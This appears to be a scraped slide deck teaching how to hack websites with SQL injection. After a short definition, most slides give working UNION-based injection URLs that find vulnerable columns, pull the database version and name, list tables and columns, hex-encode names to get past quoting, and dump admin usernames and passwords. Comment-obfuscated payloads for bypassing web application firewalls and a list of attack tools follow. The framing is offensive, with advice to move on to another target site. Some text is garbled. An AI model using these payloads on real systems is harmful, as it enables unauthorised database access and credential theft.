  • 2. What is SQL Injection  SQL injection is a technique that is applied by giving malicious inputs, that result in allowing the hacker to access over the database of the Host, in case if the database operations of that web sites is allowed directly...!  "SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks".
  • 3. How to Hack the website Using SQL Injection
  • 5. Check Site is vulnerable or Not?  Add the '(Single Quote) sign with the integer value in URL  http://www.examplesite.com/index.php?id=5'  If the site shows you an error it is vulnerable to SQL, lets say we found a vulnerable site.
  • 6. Find Number of Columns  http://www.examplesite.com/index.php?id=5 order by 1--  And we will keep increasing the number until we get an error.  http://www.examplesite.com/index.php?id=5 order by 5--  http://www.examplesite.com/index.php?id=5 order by 10--  Lets say there is 10 columns in the database.
  • 7. Find vulnerable columns.  http://www.examplesite.com/index.php?id=-5 union select 1,2,3,4,5,6,7,8,9,10--  Notice that I have put a single - in front of the id number (id=-5)  Since there is no page with the id -5 it simply put just clears the sites text for us. That makes it easier for us to find the data that we are looking for.  Okay lets say the numbers 3, 6 and 9 popped up on the site, as vulnerable columns.
  • 8. Find Database Version  http://www.examplesite.com/index.php?id=-5 union select 1,2,@@version,4,5,6,7,8,9,10--  And if that doesn't work then try this 1:  http://www.examplesite.com/index.php?id=-5 union select 1,2,version(),4,5,6,7,8,9,10--
  • 9. Find Database Name  http://www.examplesite.com/index.php?id=-5 union select 1,2, concat(database()) ,4,5,6,7,8,9,10--  Write that name down so you wont forget it. Lets say the database name i just extracted was named exampledatabase  If the version is 4 or below, it is probably best that you just move on to another site since you are gonna have to brute force the tables for information (which isn't a very good idea for starters like us )
  • 10. Find the Tables Name  http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--  http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--  http://www.examplesite.com/index.php?id=-5 union select 1,2,table_name ,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
  • 11. Find the Columns Name  http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name="admin"--  If the site shows you an error now don't panic! All that means is that Magic Quotes is turned on. To bypass this we need to convert the text "admin" into hex.
  • 12. Change the Name of Table to Hex  Copy the name of the table you are trying to access, visit the site Text to Hex, paste the name into the website where it says "Say Hello To My Little Friend". Click Convert copy the hex into your query like this.  http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x61646d696e--  Notice the 0x before the hex string. This is to tell the server that the next part is a hex string.  You should now see all the columns inside the table.
  • 13. Find the Content of the Tables  Lets say there are 2 columns called username and password. In order to see what are inside of those columns we will use this query:  http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10 from exampledatabase.admin--  This is where we needed the database name. Btw the 0x3a means colon ( : )  Now you have the admin login!  If it is decrypted, try to run it through some online md5 'decrypters' or use my free cracked  And now we have to find the admin login, to do so, once again you can
  • 14. By Pass The WAF  http://www.example.com/staffdetail.php?id=123'+/*! union*/select+1,2,3,4,5,6,7--+  http://www.example.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--  http://www.example.com/staffdetail.php?id=123'+/*!union*//*!select*/ +all+1,2,table_name,4,5,6,7+FROM+information_schema.tables+W HERE+table_schema+=+database()+LIMIT+0,10--+
  • 15. Tools for SQL Injection  SQL Ninja  SQL Map  Havij
  • 17. Thank you for your Time and Attention! 17